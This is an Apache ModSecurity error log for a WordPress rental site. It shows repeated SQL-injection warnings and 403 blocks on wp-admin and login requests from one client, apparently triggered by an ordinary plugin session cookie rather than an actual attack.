[Mon May 11 18:32:29.221182 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEnTJnyuKVXoStDhbiYgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:29.221464 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEnTJnyuKVXoStDhbiYgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:29.888832 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEnTJnyuKVXoStDhbiYgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:30.329790 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEnjJnyuKVXoStDhbiZAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:30.330075 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEnjJnyuKVXoStDhbiZAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:30.881324 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEnjJnyuKVXoStDhbiZAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:30.996197 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEnjJnyuKVXoStDhbiZgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:30.996488 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEnjJnyuKVXoStDhbiZgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:31.541852 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEnjJnyuKVXoStDhbiZgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:31.751761 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEnzJnyuKVXoStDhbiZwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:31.752032 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEnzJnyuKVXoStDhbiZwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:32.130182 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEnzJnyuKVXoStDhbiZwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:32.625252 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEoDJnyuKVXoStDhbiaAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:32.625534 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEoDJnyuKVXoStDhbiaAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:33.210978 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEoDJnyuKVXoStDhbiaAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:33.575830 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEoTJnyuKVXoStDhbiaQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:33.576104 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEoTJnyuKVXoStDhbiaQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:34.200610 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEoTJnyuKVXoStDhbiaQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:34.628719 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEojJnyuKVXoStDhbiagAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:34.628990 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEojJnyuKVXoStDhbiagAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:35.258411 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEojJnyuKVXoStDhbiagAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:35.553404 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEozJnyuKVXoStDhbiawAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:35.553686 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEozJnyuKVXoStDhbiawAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:36.281388 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEozJnyuKVXoStDhbiawAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:36.400614 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEpDJnyuKVXoStDhbibQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:36.400904 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEpDJnyuKVXoStDhbibQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:36.956896 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEpDJnyuKVXoStDhbibQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:37.087959 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEpTJnyuKVXoStDhbibgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:37.088267 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEpTJnyuKVXoStDhbibgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:37.526863 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEpTJnyuKVXoStDhbibgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:37.931305 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEpTJnyuKVXoStDhbicAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:37.931616 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEpTJnyuKVXoStDhbicAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:38.554573 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEpTJnyuKVXoStDhbicAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:38.819806 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEpjJnyuKVXoStDhbicgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:38.820107 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEpjJnyuKVXoStDhbicgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:39.438110 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEpjJnyuKVXoStDhbicgAAAFM"], referer: https://rentparadise.fr/wp-login.php
